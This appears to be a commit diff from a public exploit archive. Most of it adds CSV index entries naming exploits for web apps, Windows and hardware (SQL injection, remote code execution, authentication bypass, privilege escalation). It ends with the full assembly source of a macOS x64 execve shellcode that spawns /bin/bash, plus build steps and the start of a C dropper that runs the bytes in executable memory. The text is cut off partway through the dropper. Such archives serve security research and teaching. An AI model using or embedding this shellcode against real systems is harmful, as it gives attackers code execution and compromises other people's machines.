8846,exploits/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console - Arbitrary Command Execution",2009-06-01,Securitum,remote,hardware,,2009-05-31,,1,OSVDB-54895,,,,,
42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,,
36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info
@ -14336,6 +14339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info
28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info
28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info
51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php,,2009-08-06,,1,CVE-2009-5003;OSVDB-68191,,,,,
@ -14743,6 +14747,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28800,exploits/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,webapps,php,,2006-10-13,2017-10-13,1,CVE-2006-6592;OSVDB-32431,,,,,https://www.securityfocus.com/bid/20512/info
12729,exploits/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,webapps,php,,2010-05-23,,1,,,,,,
48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php,,2020-08-17,2020-11-13,1,CVE-2019-17240,,,,,
51160,exploits/php/webapps/51160.txt,"Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",2021-11-17,Vasu,webapps,php,,2021-11-17,2021-11-17,0,CVE-2021-35323,,,,http://www.exploit-db.combludit-3-13-1.zip,
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
@ -15026,6 +15031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,,
33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz,
51166,exploits/php/webapps/51166.py,"Cacti v1.2.22 - Remote Command Execution (RCE)",2023-03-31,"Riadh Bouchahoua",webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-46169,,,,,
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,,2020-03-02,2020-03-02,0,,,,,,
7480,exploits/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,webapps,php,,2008-12-14,2017-01-05,1,OSVDB-51063;CVE-2008-5777,,,,,
3237,exploits/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,webapps,php,,2007-01-30,,1,OSVDB-33631;CVE-2007-0677,,,,,
@ -21712,6 +21718,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3113,exploits/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,webapps,php,,2007-01-09,2016-11-16,1,OSVDB-33459;CVE-2007-0232,,,,,
6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php,,2008-07-11,2016-12-13,1,OSVDB-47025;CVE-2008-7301;OSVDB-47024;CVE-2008-3193;OSVDB-47023;CVE-2008-3192,,,,,
11445,exploits/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,webapps,php,,2010-02-13,,1,OSVDB-62329;CVE-2010-0691,,,,,
51165,exploits/php/webapps/51165.txt,"Judging Management System v1.0 - Authentication Bypass",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
51164,exploits/php/webapps/51164.py,"Judging Management System v1.0 - Remote Code Execution (RCE)",2023-03-31,"Angelo Pio Amirante",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip,
2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,,
29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,,
@ -28262,6 +28270,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49644,exploits/php/webapps/49644.txt,"rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)",2021-03-15,"Murat ŞEKER",webapps,php,,2021-03-15,2021-03-15,0,,,,,,
49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",2021-04-21,"Vishwaraj Bhattrai",webapps,php,,2021-04-21,2021-10-28,0,,,,,,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",2021-03-18,"Murat ŞEKER",webapps,php,,2021-03-18,2021-10-28,0,,,,,,
51163,exploits/php/webapps/51163.py,"rconfig 3.9.7 - Sql Injection (Authenticated)",2023-03-31,azhen,webapps,php,,2023-03-31,2023-03-31,0,CVE-2022-45030,,,,,
48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-10221,,,,,
9552,exploits/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,webapps,php,,2009-08-30,,1,,,,,,
11943,exploits/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,webapps,php,,2010-03-28,,1,,,,,,
@ -28850,6 +28859,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info
34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,,
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,,
51161,exploits/php/webapps/51161.txt,"Senayan Library Management System v9.0.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz,
3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz,
@ -29697,6 +29707,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",webapps,php,,2011-03-29,2014-12-15,1,,,,,,https://www.securityfocus.com/bid/47077/info
51162,exploits/php/webapps/51162.txt,"Spitfire CMS 1.0.475 - PHP Object Injection",2023-03-31,LiquidWorm,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
27601,exploits/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - Cross-Site Request Forgery",2013-08-15,"Yashar shahinzadeh",webapps,php,,2013-08-15,2013-08-15,0,OSVDB-66409,,,,,
32554,exploits/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",webapps,php,,2008-10-31,2014-03-27,1,OSVDB-106996,,,,,https://www.securityfocus.com/bid/32012/info
21514,exploits/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,webapps,php,,2002-06-06,2012-09-24,1,CVE-2002-0959;OSVDB-9233,,,,,https://www.securityfocus.com/bid/4953/info
@ -30216,6 +30227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36489,exploits/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Cross-Site Scripting",2012-01-04,"Jonathan Claudius",webapps,php,,2012-01-04,2015-03-25,1,CVE-2011-5019;OSVDB-78133,,,,,https://www.securityfocus.com/bid/51254/info
44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,,2018-03-12,2018-03-12,0,CVE-2018-7474,,,,,
49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
51176,exploits/php/webapps/51176.txt,"Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)",2023-03-31,"Alperen Ergel",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
14823,exploits/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,webapps,php,,2010-08-28,2010-08-28,0,CVE-2010-3205;OSVDB-67800,,,,http://www.exploit-db.comtextpattern-4.2.0.tar.gz,
48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,,2020-10-07,2020-10-07,0,,,,,,
48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php,,2020-10-19,2020-10-19,0,,,,,,
@ -32096,6 +32108,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,,2020-12-02,2021-04-21,0,CVE-2020-35313,,,,,
1982,exploits/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion",2006-07-04,OLiBekaS,webapps,php,,2006-07-03,,1,OSVDB-34426;CVE-2006-3422,,,,,
44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,,2018-04-09,2018-04-09,0,,,,,,
51156,exploits/php/webapps/51156.txt,"WooCommerce v7.1.0 - Remote Code Execution(RCE)",2023-03-31,"Milad karimi",webapps,php,,2023-03-31,2023-03-31,0,,,,,,
12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,webapps,php,,2010-05-10,,1,,,,,,
50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
@ -39240,6 +39253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
50690,exploits/windows/local/50690.txt,"CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path",2022-02-02,"Angel Canseco",local,windows,,2022-02-02,2022-02-02,0,,,,,,
47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,,2019-11-12,2019-11-12,0,,,,,,
51159,exploits/windows/local/51159.txt,"CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path",2023-03-31,"Damian Semon Jr",local,windows,,2023-03-31,2023-03-31,0,,,,,,
39594,exploits/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Local Stack Overflow",2016-03-22,"Charley Celice",local,windows,,2016-03-22,2016-03-23,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-03-23-at-150050.png,http://www.exploit-db.comCoolPlayer219_Bin.zip,
4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows,,2008-01-04,2016-11-14,1,CVE-2006-6288,,,,http://www.exploit-db.comCoolPlayer217_Bin.zip,
6157,exploits/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",local,windows,,2008-07-28,2016-12-14,1,OSVDB-47194;CVE-2008-3408,,,,,
@ -40926,6 +40940,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8624,exploits/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,local,windows,,2009-05-06,,1,OSVDB-54562;CVE-2009-1643,,,,http://www.exploit-db.comsoritong10.exe,
44896,exploits/windows/local/44896.vb,"Soroush IM Desktop App 0.15 (beta) - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,,2018-06-15,2018-06-19,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,http://www.exploit-db.comSoroush-0.15.0.exe,
45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,,2018-08-09,2018-09-04,0,,,,,http://www.exploit-db.comSoroushSetup0.17.0(1).exe,
51170,exploits/windows/local/51170.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51169,exploits/windows/local/51169.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51171,exploits/windows/local/51171.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51168,exploits/windows/local/51168.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51172,exploits/windows/local/51172.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51173,exploits/windows/local/51173.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE)",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51174,exploits/windows/local/51174.txt,"SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
51167,exploits/windows/local/51167.txt,"SOUND4 Server Service 4.1.102 - Local Privilege Escalation",2023-03-31,LiquidWorm,local,windows,,2023-03-31,2023-03-31,0,,,,,,
9970,exploits/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Local Privilege Escalation",2009-10-20,bellick,local,windows,,2009-10-19,,1,,,,,,
11264,exploits/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,local,windows,,2010-01-25,2010-06-27,0,CVE-2009-4606;OSVDB-59080,,,,http://www.exploit-db.comwebdrive.exe,
49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -831,6 +831,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,,
46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,,
46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,,
51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,,
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,,
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,,
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",,multiple,99,2005-11-14,,1,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
831 46397 shellcodes/macos/46397.c Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara macos 31 2019-02-18 2019-05-23 0
832 46395 shellcodes/macos/46395.c Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2019-02-18 Ken Kitahara macos 103 2019-02-18 2019-02-18 0
833 46393 shellcodes/macos/46393.c Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes) 2019-02-18 Ken Kitahara macos 119 2019-02-18 2019-05-23 0
834 51177 shellcodes/macos/51177.txt macOS/x64 - Execve Null-Free Shellcode 2023-03-31 boku macos 253 2023-03-31 2023-03-31 0
835 39885 shellcodes/multiple/39885.c BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator) 2016-06-06 odzhancode multiple 194 2016-06-16 2018-01-21 1 http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png
836 13469 shellcodes/multiple/13469.c BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) 2004-09-12 dymitri multiple 38 2004-09-11 1
837 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson multiple 99 2005-11-14 1

216
shellcodes/macos/51177.txt Normal file
View file

@ -0,0 +1,216 @@
# Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)
# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
# Date: 12/20/2022
# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
# Shellcode Description:
# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.
# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
# Compile & run:
# nasm -f macho64 execve.asm -o execve
# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
# # Add shellcode to dropper.c
# gcc dropper.c -o dropper
# sh-3.2$ pstree -p $(echo $$) | grep $$
# \-+= 56862 bobby sh
# sh-3.2$ ./dropper
# [+] Shellcode Length: 253 Bytes
# [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000
# [+] Executing shellcode at 0x10e643000
# bobby$ pstree -p $(echo $$) | grep -B1 $$
# \-+= 56862 bobby sh
# \-+= 57021 bobby (bash)
bits 64
global _main
_main:
create_stackframe:
push rbp ; push current base pointer to the stack
mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
sub rsp, 0x60 ; create space for string
mov [rbp-0x8], rsp ; Save destination string buffer address
jmp short lilypad_1
; char * string eggHunter(egg);
; RAX RDI
; description: starts searching for the supplied egg starting from the callers return address
eggHunter:
mov rcx, [rsp] ; start the egghunter from the caller function return address
hunt:
inc rcx ; move to the hunter to the next byte
cmp [rcx], di ; did we find the first egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; move hunter to 2nd egg location
cmp [rcx], di ; did we find the second egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
xchg rax, rcx ; return start of string address
ret
; int length strsize(&string, terminator);
; RAX RDI RSI
; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
strsize:
xor rax, rax ; clear register
xor rcx, rcx ; set the counter to zero
strsize_loop:
mov rcx, rdi ; start of string address
add rcx, rax ; current memory location of char in string
cmp [rcx], sil ; is this the null terminator?
je strsize_return
prevent_infinite_loop:
cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
jg strsize_fail2find ; if value in RAX is greater, jump to label
inc rax ; move to the next char in the string
jmp strsize_loop
strsize_fail2find:
xor rax, rax ; return null/ 0x0
strsize_return:
ret
lilypad_1:
jmp short lilypad_2
; char * string terminateString(&string, terminator);
; RAX RDI RSI
; description: Finds the string terminator and changes it to a null byte
terminateString:
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start address to look for terminator
loop_find_terminator:
cmp [rcx], sil ; is this the null terminator?
je found_terminator
inc rcx ; move to the next char in the string
jmp loop_find_terminator
found_terminator:
mov [rcx], al
ret
; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
; RAX RDI RSI RDX
; description: Move memory from source address to destination address
; ARG1 - RDI: destination address
; ARG2 - RSI: source address
; ARG3 - RDX: size of the memory
move_memory:
; Loop through memory and move each byte from source to destination
push rdi ; save the destination address so we can return it at the end
xor rax, rax ; register to temporarily hold the byte we are copying
move_memory_loop:
mov al, [rsi] ; read the byte from source address into the temporary register
mov [rdi], al ; write the byte at the destination address
inc rsi ; increment source address
inc rdi ; increment destination address
dec rdx ; decrement memory size
jnz move_memory_loop ; repeat loop until memory size is 0
; Return to caller
pop rax ; return the destination address of the memory to the caller
ret
lilypad_2:
jmp short lilypad_3
; void clear_memory(void *dst_addr, size_t mem_size);
; RDI RSI
; description: Writes 0x00 bytes to a destination address
; ARG1 - RDI: a pointer to the destination address
; ARG2 - RSI: the size of the memory to be written to
clear_memory:
mov rcx, rsi ; load memory size from second argument into rcx
xor rax, rax
; Loop through memory and write 0x00 to each byte in destination address
clrmem_loop:
mov byte [rdi], al ; write 0x00 to byte in destination address
inc rdi ; increment destination address
dec rcx ; decrement memory size
jnz clrmem_loop ; repeat loop until memory size is 0
; Return to caller
ret
lilypad_3:
; *string = eggHunter(egg); Starts hunt from return address of caller
find_execve_string:
xor rdi, rdi ; clear register
mov di, 0xBCB0 ; Arg 1: Our egg
call eggHunter ; returns string start address
mov [rbp-0x10], rax ; Save string address
get_strlen:
mov rdi, [rbp-0x10] ; Arg 1: string start address
xor rsi, rsi ; clear register
mov sil, 0xFF ; Arg 2: string terminator
call strsize ; returns string size
mov [rbp-0x18], rax ; Save string size
; move_memory(dst_addr, src_addr, mem_size);
; RDI RSI RDX
copy_str2stack:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
mov rsi, [rbp-0x10] ; Arg 2: Original string location
mov rdx, [rbp-0x18] ; Arg 3: size
call move_memory
do_terminate_string:
mov rdx, [rbp-0x18] ; string size
mov rdi, [rbp-0x8] ; String buffer on stack
add rdi, rdx ; Arg 1: string terminator location
xor rsi, rsi ; clear register
mov sil, 0x1 ; Arg 2: mem size to null
call clear_memory ; returns string size
; execve("/bin/bash",NULL,NULL)
execve:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
xor rsi, rsi ; Arg 2: NULL
xor rdx, rdx ; Arg 3: NULL
xor rax, rax ; clear register for syscall number setup
mov al, 0x2 ; set a bit in register
ror rax, 0x28 ; move the bit over 28 bits to the right in the register
mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
syscall ; do syscall interrupt
fixstack:
add rsp, 0x60 ; clear allocated stack space
pop rbp ; restore stack base pointer
ret ; return to caller
shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF
###########################################################################################################################################
// dropper.c
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*execute_shellcode)();
const unsigned char shellcode[] =
